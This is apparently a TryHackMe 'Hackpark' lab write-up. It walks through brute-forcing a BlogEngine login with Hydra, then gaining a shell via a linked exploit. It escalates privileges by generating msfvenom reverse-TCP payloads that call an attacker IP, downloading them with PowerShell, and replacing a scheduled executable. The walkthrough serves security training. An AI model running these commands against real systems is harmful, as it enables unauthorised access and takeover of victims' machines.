THM: Hackpark(Windows/Medium/Web-app/Hydra) write-up

https://tryhackme.com/room/hackpark

nmap result: 

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl     Microsoft SChannel TLS
| fingerprint-strings: 
|   TLSSessionReq: 
|     d])j
|     hackpark0
|     220118035740Z
|     220720035740Z0
|     hackpark0
|     x&!LQ&RK
|     ^r@TQ|;X
|     V[%[
|     <o}G
|     \xff8
|     Tr?0
|     $0"0
|     _Uh^
|     *)[P
|     _sTJ
|_    fzjW)
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2022-01-18T03:57:40
|_Not valid after:  2022-07-20T03:57:40
|_ssl-date: 2022-01-19T03:59:53+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.60%I=7%D=1/19%Time=61E78CAA%P=x86_64-pc-linux-gnu%r(TL
SF:SSessionReq,33C,"\x16\x03\x03\x037\x02\0\0M\x03\x03a\xe7\x8c\xa5\xd9\x9
SF:1y\xb9\xe0\x8fy\x04\n\xf4\x92d\]\)j\xf68\r\x11LY\x9b\xd9/t\xf6\xe3\r\x2
SF:0\(<\0\0@\xbdgc_\x04\x04\x08\x1d<\xab\xcf\x1e\xe9n~\xb8\^\x87\xc4\xe6%4
SF:\xeb\(\xde\x9f\xd0\0/\0\0\x05\xff\x01\0\x01\0\x0b\0\x02\xde\0\x02\xdb\0
SF:\x02\xd80\x82\x02\xd40\x82\x01\xbc\xa0\x03\x02\x01\x02\x02\x10B\x99t\(\
SF:xca\xae\xef\xaaI\x1f\xb0b\xef\xf8\x88\xb70\r\x06\t\*\x86H\x86\xf7\r\x01
SF:\x01\x05\x05\x000\x131\x110\x0f\x06\x03U\x04\x03\x13\x08hackpark0\x1e\x
SF:17\r220118035740Z\x17\r220720035740Z0\x131\x110\x0f\x06\x03U\x04\x03\x1
SF:3\x08hackpark0\x82\x01\"0\r\x06\t\*\x86H\x86\xf7\r\x01\x01\x01\x05\0\x0
SF:3\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\0\xcd/\x04\x8e&\+\xa7\xb1E
SF:\xda\xa2p\xc5\xf8\x16\xc0gS\xfe\xbdH\xef\xc5k\xaa\xe5\xb2\xb7\x08\x85\x
SF:bb\x81sgM\xb8\xd81\xa7x&!LQ&RK\x05\xd1\x9b\xa4\xb3\xc32\xe5\xb8\x03\x17
SF:\xbcu\xb7\x06\xfe\xc8ws\xca\xb8#Z\xef\xa3\x07&d\xa9\xffd\xf039\xf3\x1f\
SF:xef5\xf7/\xf5\xea\x8b\x07V`\xc1\xa6\xf2\x8f4\x02_\$U\xea\xec4\xbfJ>\x10
SF:\x146\xdd\xdah\x16\xde\x14\xeb\xf2\xc8O\x8e{\xcc\xc3\x15w\xca\xd8\xe2q\
SF:xa7\xc0d\x0c\^r@TQ\|;X\xefi\xc7\x96\xcd\x0fu\x06\xfb\xcb\0\$\x98V\[%\[\
SF:x07\xb3\xe4NFo\x01<o}G\xee\xf25\xb0\xa8\xed\xaa\xc5mrk\xfc\xec\xfb\xd8\
SF:xe2\xd0\xe8\xa4\(\xa4\x1b\xaa\xf5\xc7\x84\xf7u\x82u\]\xe3\\\xff8\xb4\x0
SF:1\xd9\x8cO\xcer\x11\xdbZ\xd7~6\x80\xa5U\x87\"\xb3\xbeTr\?0\x95\0/\xbe}Z
SF:\xe0\x80\xfb\xf5\xf4\xf4W\xc9RP\xb3p@\xd7\+\x97#\xf0\xaa\xfd\x02\x03\x0
SF:1\0\x01\xa3\$0\"0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08\+\x06\x01\x05\x0
SF:5\x07\x03\x010\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x0400\r\x06\t\*\x86
SF:H\x86\xf7\r\x01\x01\x05\x05\0\x03\x82\x01\x01\0/\xd7\xa6\xbbE\xcc\xdcU\
SF:xe0\xce\x8e\?\xaf\xa3O\xbc\x01\]\xa9;\xcf\t\xbf\x10\.'\x85\xcfy\x9d%,\x
SF:cf\xd3/\xb5\x0b\x87W\xd1\x02\x9d\xf4V\xe1o\(\xd0\x9d\xa7\x0cZ7\xd3\xa4A
SF:\xfa\x9f\xfa\xf7\x96\x90\xaaO\x19\x84\xa7\xdb@\xd45\+\"\xc7\xb3\xdc\xe1
SF:\xac\xe3\x1c\xa7\x7f\"C\xac\x8cg\x80\+\xe4\x17\x98\xeeSl\x96\xf4\x94\x1
SF:3B\xb7\xec\xd6\x93\x1b\x1em\x92lT\x8a\xac\$\xd3p\x87\xf1'\x08\x9a\x9a{<
SF:\xbb\x83\x8c\xb63B\xa6\xef\x12}\x8a\x17\xfd\x8e\x18\)\xd5\xcc\x88y\x8e\
SF:x93\xb5\xd0\xcc\xff\x8b\xf8\x88\xee\xe6\0a\x99Nj\xade\.\x0c\xdd0\xeb_Uh
SF:\^\x98D\xf5\x0f\xcb\*\)\[P\xf5\x20\x1f\x979\x83o\xab\xc00\xd5\xd1\x97O3
SF:\xa5\x83_sTJ\xa6\x0b\xcc\x16\xddV\xa5\[\xe2\x9e\x90\xccN\x9d\xac7\x07\x
SF:d9\x97\xb2\xcf\xaa/\xfd@\xc9\xcb\xa7n\xd8\xfeI\xf3QJ\xc5\x8e\x1c\x04-;\
SF:x19\xfb\xc4\xc2\x8c\]\xddM\x85\nfzjW\)\x0e\0\0\0");
MAC Address: 02:64:86:26:8A:A3 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms ip-10-10-202-97.eu-west-1.compute.internal (10.10.202.97)

hydra to crack the password for the login form.

Cracking password with Burpsuite and hydra.

  1. Interecept the login traffic with proxy and burpuite and observe what's going on.

  2. I could tell that the request was POST and needed some parameters to complete.

  3. Hydra requires ^USER^ and ^PASS^ values along with the login failed option (you could use -s to show the success pattern, too), so I modified the command such as below. 

hydra -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.202.97
 http-post-form "/Account/login.aspx?ReturnURL=/admin/
 :__VIEWSTATE=i%2Bx%2BpL85m1t4WpnjCku%2B0tFIMcIkXnh2eUsU72wnE0UzPkCK18CK
 EpGgyzccugqMH5EJX3SzMu%2B%2F8D0eXCUJ1vlnIv94TXdUYIhQKcW%2Fn16BCmSOkqgoU
 185z5871Osc0Ojw4WAV6cU58HYCFsxaEj%2FREdH%2BUPp5C%2FybBqenodpJE8G1&__
 EVENTVALIDATION=zKCA0%2BYlVze28cv8jw6w%2FVTFl7oxWdI8mimzeKKwwlw7
 QLoMFsukQP6FmFx1swzpP0ge9r2MJPtSuKecL3TCLHQ3e44aFQ08MxZC2xaCK8laX3WxAAAfB4v
 HBFhEVexKfHOtpOPUqMlnYEasinUrcVmghftsPAdmeBaHmoAYlCpGINpf&ctl00%24MainCo
 ntent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%
 24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:
 Login failed" 

Hydra (http://www.thc.org/thc-hydra) starting at 2022-01-19 04:53:26
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.202.97:80//Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=i%2Bx%2BpL85m1t4WpnjCku%2B0tFIMcIkXnh2eUsU72wnE0UzPkCK18CKEpGgyzccugqMH5EJX3SzMu%2B%2F8D0eXCUJ1vlnIv94TXdUYIhQKcW%2Fn16BCmSOkqgoU185z5871Osc0Ojw4WAV6cU58HYCFsxaEj%2FREdH%2BUPp5C%2FybBqenodpJE8G1&__EVENTVALIDATION=zKCA0%2BYlVze28cv8jw6w%2FVTFl7oxWdI8mimzeKKwwlw7QLoMFsukQP6FmFx1swzpP0ge9r2MJPtSuKecL3TCLHQ3e44aFQ08MxZC2xaCK8laX3WxAAAfB4vHBFhEVexKfHOtpOPUqMlnYEasinUrcVmghftsPAdmeBaHmoAYlCpGINpf&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 736.00 tries/min, 736 tries in 00:01h, 14343662 to do in 324:49h, 16 active
[80][http-post-form] host: 10.10.202.97   login: admin   password: PASS_WORD
[STATUS] attack finished for 10.10.202.97 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-01-19 04:55:38

This gave me the password for admin login.

Once you login, you want to identify the version of the webserver and see if there's any exploit.

The blog engine version indeed had a vulnerability and an exploit: https://www.exploit-db.com/exploits/46353

Follow the steps of the script to gain a shell.

Prev Esc with Meterpreter:

Let’s generate our executable with msfvenom (make sure you select a different port as the one used for the previous reverse shell):

$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.141.12 LPORT=2345 -f exe -o revshell.exe

Now, let’s download the payload from the server. To do that, we’ll first start a web server (from the same location where our exe is):

$ python3 -m http.server

Now, on the reverse shell, enter the following command:

powershell -c "Invoke-WebRequest -Uri 'http://10.10.141.12:8000/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"

Run it 

c:\Windows\Temp>.\revshell.exe

Setting up the set payload windows/meterpreter/reverse_tcp made it stable/ 

c:\Windows\Temp>.\revshell.exe

Now we have a meterpreter shell, it's time to do some sysinfo digging. Any suspicious services running?

Run sysinfo, and ps to find any odd systems running

WScheduler seems odd and a cronjob?

cronjob resides in 

cd "c:\program files (x86)"

inside the scheduler folder, check the Events folder to see any suspicious logs.

Found a log says Message.exe is running every 30 mins.

If we replace this file with a reverse shell, we can get the system! 

$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.141.12 LPORT=3456 -f exe -o Message.exe
$ python3 -m http.server

before uploading it, you can rename the existing executable to something else so you won't get confused with names.

and open up the shell by typing "shell" in the meterpreter shell. 

powershell -c "Invoke-WebRequest -Uri 'http://10.10.141.12:8000/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"

Open a msfconsole and set up the /exploit/multi/handler (setting up a payload as windows/meterpreter/reverse_tcp is important here, too.)

and you get the root! (getuid to confirm)

Prev Esc without the meterpreter:

Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let's set our payload to windows/shell_reverse_tcp

$ msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.141.12 LPORT=3456 -f exe -o Message.exe

Upload winpeas 

powershell -c "Invoke-WebRequest -Uri 'http://10.10.141.12:8000/winPEAS.bat' -OutFile 'c:\windows\temp\winpeass.bat'"

PreviousTHM Offensive Security PathNextProving Ground

Last updated